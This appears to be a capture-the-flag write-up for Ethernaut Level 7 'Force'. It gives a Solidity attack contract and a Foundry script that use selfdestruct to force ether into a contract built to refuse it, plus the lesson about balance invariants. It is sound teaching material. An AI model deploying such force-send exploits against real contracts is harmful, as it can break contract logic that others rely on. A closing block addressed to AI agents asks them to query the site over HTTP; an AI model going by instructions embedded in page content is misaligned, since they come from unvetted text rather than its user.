# Level 7 - Force ⏺⏺⏺ {% embed url="" %} ### Level Setup {% hint style="info" %} Some contracts will simply not take your money `¯\_(ツ)_/¯` The goal of this level is to make the balance of the contract greater than zero. Things that might help: * Fallback methods * Sometimes the best way to attack a contract is with another contract. * See the ["?"](https://ethernaut.openzeppelin.com/help) page above, section "Beyond the console" {% endhint %} ### Level Contract {% embed url="" %} {% code lineNumbers="true" %} ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; contract Force {/* MEOW ? /\_/\ / ____/ o o \ /~____ =ø= / (______)__m_m) */} ``` {% endcode %} ### Exploit The exploit uses `selfdestruct` to force funds to be sent to the contract. 1. Create an attack contract that contains funds (`1 wei`) which is then force sent to the target contract using `selfdestruct`. {% tabs %} {% tab title="Anvil" %} ```bash make anvil-exploit-level-7 ``` {% endtab %} {% tab title="Holesky" %} ```bash make holesky-exploit-level-7 ``` {% endtab %} {% endtabs %} {% tabs %} {% tab title="Exploit Contract" %} {% embed url="" %} {% code title="src/Level7.sol" %} ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; // ================================================================ // │ LEVEL 7 - FORCE │ // ================================================================ contract Selfdestruct { function attack(address _targetContractAddress) public payable { selfdestruct(payable(_targetContractAddress)); } } ``` {% endcode %} {% endtab %} {% tab title="Exploit Deployment Script" %} {% embed url="" %} {% code title="script/Level7.s.sol" %} ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.18; import {Script, console} from "forge-std/Script.sol"; import {HelperFunctions} from "script/HelperFunctions.s.sol"; import {Selfdestruct} from "../src/Level7.sol"; // ================================================================ // │ LEVEL 7 - FORCE │ // ================================================================ contract Exploit is Script, HelperFunctions { function run() public { address targetContractAddress = getInstanceAddress(); vm.startBroadcast(); Selfdestruct targetContract = new Selfdestruct(); targetContract.attack{value: 1 wei}(targetContractAddress); vm.stopBroadcast(); } } ``` {% endcode %} {% endtab %} {% endtabs %} 2. Submit instance... 🥳 ### Completion Message {% hint style="info" %} In solidity, for a contract to be able to receive ether, the fallback function must be marked `payable`. However, there is no way to stop an attacker from sending ether to a contract by self destroying. Hence, it is important not to count on the invariant `address(this).balance == 0` for any contract logic. {% endhint %} ### Notes {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.eridian.xyz/ethereum-dev/defi-challenges/ethernaut/level-7-force.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.